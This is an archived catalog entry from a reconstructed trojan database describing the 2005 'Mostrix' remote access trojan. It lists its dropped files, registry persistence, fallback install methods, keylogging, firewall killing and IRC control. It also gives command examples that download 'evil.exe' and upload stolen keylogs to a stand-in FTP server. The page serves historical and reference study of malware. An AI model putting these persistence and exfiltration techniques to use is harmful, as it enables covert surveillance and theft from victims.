Archive Helmet Icon Archive A Reconstructed © MegaSecurity Database

I Feel Lucky I Feel Very Lucky

Mostrix

Released 20 years, 10 months ago. June 2005

Copyright © MegaSecurity

By DiA

Informations
Author DiA
Family Mostrix
Category Remote Access
Version Mostrix
Released Date Jun 2005, 20 years, 10 months ago.
Additional Information
Server:
dropped files:
c:\WINDOWS\MStr.exe            Size: 10,240 bytes 
c:\WINDOWS\mslog\070206.sys    Size: 127 bytes 

startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "MS.trix"
data: C:\WINDOWS\MStr.exe 

attempts to connect to an IRC Server

tested on Windows XP
February 07, 2006

Author Information / Description
features:
		- install itself into system with 4 methods:
			> first try to copy to windows folder and do autostart registry entry
			> if Mostrix can't write to registry it edit win.ini in windows folder
			> if Mostrix can't write to windows directory it try's to copy itself
			  to startup folder
			> if it can't copy to startup folder, it edit's autoexec.bat in C:\
		- log every key event and foreground windows and save all log's
		  under current date .sys in windows directory under subdir "mslog"
		- kill some favorite firewalls and internet security suites
		- connect to irc.freenode.net and accept private commands in chan "mostrix"
		- reconnect every half hour

	commands:
		- every command is only accepted at privat chat!

		systeminfo 'temporary file path'
		ae: systeminfo 'C:\info.txt'

			> this command get some info about infected system and save it
			  in a temporary file...

		dirlist 'directory to list' 'temporary file path'
		ae: dirlist 'C:\' 'C:\C_drive_dirs.txt'

			> this command list all sub directorys in a temporary file...

		filelist 'directory to list' 'temporary file path'
		ae: filelist 'C:\' 'C:\C_drive_files.txt'

			> this command list all files in one directory and save it
			  in a temporary file...

		delete 'file to delete'
		ae: delete 'C:\C_drive_files.txt'

			> this command delete's a file, just use it to remove your
			  temporary files...

		execute 'application to execute'
		ae: execute 'C:\Windows\Notepad.exe'

			> this command executes a application, maybe one you downloaded
			  to the infected computer...

		download 'http:// url file to download' 'save path'
		ae: download 'http://server.com/user/evil.exe' 'C:\nice.exe'

			> download's a file via http protocol to local infected computer...

		upload 'file to upload' 'ftp server' 'user' 'password'
		ae: upload 'C:\info.txt' 'server.com' 'user' 'drowssap'

			> this command upload's a local file of infected computer
			  to your ftp server, name at ftp server is the same on disk...

	steal a log:
		Let's say you want a keylog from the 7. June 2005, just do so
		(imaging "Windows" is the windows directory):

			upload 'C:\Windows\mslog\070605.sys' 'server.com' 'user' 'pass'

DiA

This archive is an almost-complete reconstruction of the legendary Mega Security (also known as Kobayashi), a premier 90s-era "Trojan Database" where malware authors once showcased their work. After a decade offline, the site was brought back in August 2024 by its original creator, MasterRat, who authorized the Malware Gallery to host this modernized, searchable version of the collection. While the original site remains available for those seeking a nostalgic, old-school experience, we are proud to continue its legacy here. Full credit and thanks go to MasterRat and the retired Mega Security staff for their years of dedicated work in cataloging these historical samples.